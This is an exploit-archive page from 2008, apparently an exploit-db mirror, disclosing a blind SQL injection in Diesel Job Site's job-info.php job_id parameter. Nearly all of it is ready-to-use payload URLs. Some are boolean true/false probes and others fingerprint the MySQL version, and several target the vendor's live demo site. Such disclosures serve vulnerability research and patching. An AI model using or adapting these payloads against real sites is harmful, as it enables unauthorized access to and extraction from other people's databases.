[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Diesel Job Site (job_id) Blind SQL Injection Vulnerability
# Published : 2008-09-21
# Author : Stack
# Previous Title : 6rbScript 3.3 (singerid) Remote SQL Injection Vulnerability
# Next Title : Rianxosencabos CMS 0.9 Arbitrary Add-Admin Vulnerability


Diesel Job Site Blind Sql Injection P0c
Author : Stack
Home Script :  http://www.dieselscripts.com

Desc :
look the select Job Viewed: in [real id]+and+1=1 (true) the times change each time
but in [real id]+and+1=0 (false) it remains stable
 
go to url exploit or poc 2 or 3 times for see the difference
between (true) and (false)
 
P0c :
http://site.il/jobs/jobseekers/job-info.php?job_id=[real id]+and+1=1
http://site.il/jobs/jobseekers/job-info.php?job_id=[real id]+and+1=0
Exploit :
http://site.il/jobs/jobseekers/job-info.php?job_id=[real id]+and+substring(@@version,1,1)=5
http://site.il/jobs/jobseekers/job-info.php?job_id=[real id]+and+substring(@@version,1,1)=4
Live Demo P0c :
http://www.dieselscripts.com/demo/jobs/jobseekers/job-info.php?job_id=56+and+1=1
http://www.dieselscripts.com/demo/jobs/jobseekers/job-info.php?job_id=56+and+1=0
Live Demo Exploit :
http://www.dieselscripts.com/demo/jobs/jobseekers/job-info.php?job_id=56+and+substring(@@version,1,1)=5
http://www.dieselscripts.com/demo/jobs/jobseekers/job-info.php?job_id=56+and+substring(@@version,1,1)=4

# www.Syue.com [2008-09-21]